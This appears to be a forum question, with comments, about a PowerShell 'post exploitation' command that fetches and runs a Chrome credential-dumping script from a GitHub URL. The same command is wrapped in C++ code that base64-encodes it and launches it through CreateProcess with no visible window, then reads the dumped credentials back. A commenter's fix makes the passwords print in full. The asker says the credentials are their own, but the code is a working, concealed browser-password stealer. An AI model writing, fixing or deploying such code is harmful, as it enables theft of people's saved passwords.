# Powershell post exploitation script not working as expected

Tags: c++, powershell

I'm testing and using this command to dump my own Chrome credentials.

```
powershell.exe "iex (iwr https://raw.githubusercontent.com/kerrymilan/Get-ChromeCreds2/master/Get-ChromeCreds2.ps1);" > out.txt
```

It works, But if this is executed in C++ Windows function CreateProcess, The output is like this

```
Url                Username
----               ---------
www.example.com     tes...
```

And no passwords. Why is this happening?

Here is the C++ function

```cpp
std::string test()
{
    STARTUPINFO sinfo;
    std::string script = b64decode("cG93ZXJzaGVsbC5leGUgImlleCAoaXdyIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9rZXJyeW1pbGFuL0dldC1DaHJvbWVDcmVkczIvbWFzdGVyL0dldC1DaHJvbWVDcmVkczIucHMxKTsiID4gb3V0LnR4dAo=");
    PROCESS_INFORMATION pinfo;
    memset(&sinfo, 0, sizeof(sinfo));
    if(CreateProcess(NULL, (LPSTR)script.c_str(), NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo)){
        WaitForSingleObject(pinfo.hProcess, INFINITE);
        CloseHandle(pinfo.hProcess);
        CloseHandle(pinfo.hThread);
    }

    return readFileContents("out.txt");
}
```

Comment: Maybe some kind of permission issue? I'm not too familiar with how permissions work when calling from within an application like that, but within the script you posted above I saw this: `Decode the password using Windows' crypto functions.  This will only be successful if the database belongs to the currently logged-in user.`

Comment: @mukunda No that's not the issue. Because the database does belong to the currently logged user, And also, It is working, but the output is not complete. :(

Comment: `.../Get-ChromeCreds2.ps1) |ConvertTo-Csv;"`

Comment: @MathiasR.Jessen that worked! Thanks alot! Can I ask how did you figure it out?